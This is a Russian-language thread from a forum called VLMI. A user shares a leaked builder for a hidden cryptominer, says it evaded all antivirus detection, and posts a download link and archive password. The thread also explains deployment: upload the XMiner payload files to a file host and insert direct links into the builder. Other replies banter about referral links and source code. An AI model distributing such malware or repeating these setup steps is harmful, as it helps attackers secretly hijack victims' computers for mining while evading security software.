• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Слив билдера скрытого майнера из под огромного хайда

Mr_VVoodman

Резидент
Реакции
278
0 руб.
Последнее редактирование:

raister

Участник
Реакции
26
0 руб.
как бы самому не схватить скрытый майнер, который не палиться антивирусом, eset спалил хрень еще на скачивании

Mr_VVoodman

Резидент
Реакции
278
0 руб.
как бы самому не схватить скрытый майнер, который не палиться антивирусом, eset спалил хрень еще на скачивании
Видимо слили на VT, о тем не менее он хорошо, лучше бы прочекал, а потом писал про хрень.

Moshennik

Резидент
Реакции
164
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.
Дамы и господа, сегодня я представляю вам билдер скрытого майнера слитого с одного форума из под огромного хайда (666 сообщений), на тот момент, когда я делал себе билд он не палился ни одним антивирусом! К сожалению, что на данный момент я не знаю, прочекаете сами. Впрочем хватит долгих разговоров, вот сам билдер: http://rgho.st/private/6DSg88DPz/6a4a0f4d9eec7790b270fe407e0a7f59
Пароль: 377UHLeQa59D
Инструкция внутри.
Удачи в майнинге.
Странно за такой слив лукас не поставить
можно подробней не понял что на сервер грузить )

Mr_VVoodman

Резидент
Реакции
278
0 руб.
Внутри основной папки есть папка XMiner, в ней находятся 2 файла, эти файлы надо загрузить на какой-нибудь файлообменник или свой сайт размещённый к примеру на каком-нибудь бесплатном хостинге. В билдер надо вставить прямые ссылки на файлы, что бы при переходе сразу начиналось скачивание. Надеюсь объяснил.

Moshennik

Резидент
Реакции
164
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.
Внутри основной папки есть папка XMiner, в ней находятся 2 файла, эти файлы надо загрузить на какой-нибудь файлообменник или свой сайт размещённый к примеру на каком-нибудь бесплатном хостинге. В билдер надо вставить прямые ссылки на файлы, что бы при переходе сразу начиналось скачивание. Надеюсь объяснил.
потом запускаешь билд и все работает ?

linuxis

Местный
Реакции
62
0 руб.
рефералка в ссылке:))
Откуда же вы берётесь такие умные?))))
Ни кто, слышите, ни кто не нажимайте на ссылку, ТС разбогатеет на нас и выкачает все очень важные фото с компа "Отдых в Адлере 2012 года" :sob::laughing::joy:
Насмешил реферальщик))

Mr_VVoodman

Резидент
Реакции
278
0 руб.
Откуда же вы берётесь такие умные?))))
Ни кто, слышите, ни кто не нажимайте на ссылку, ТС разбогатеет на нас и выкачает все очень важные фото с компа "Отдых в Адлере 2012 года" :sob::laughing::joy:
Насмешил реферальщик))
Парень, не знаешь, не говори.

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Эх, были бы исходники...

linuxis

Местный
Реакции
62
0 руб.

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109
0 руб.
Telegram
Что именно я не знаю? То, что это http://hiderefer.me и это /6a4a0f4d9eec7790b270fe407e0a7f59
Рефералка?)))Конечно знаю и думаю, что все на мне зарабатывают миллионы,а разве не так? :no_mouth:
Возьми любую ссылку на форуме, и будет то же самое.

linuxis

Местный
Реакции
62
0 руб.

Kirito54

Живу как хочу

Kirito54

Живу как хочу
Местный
Реакции
109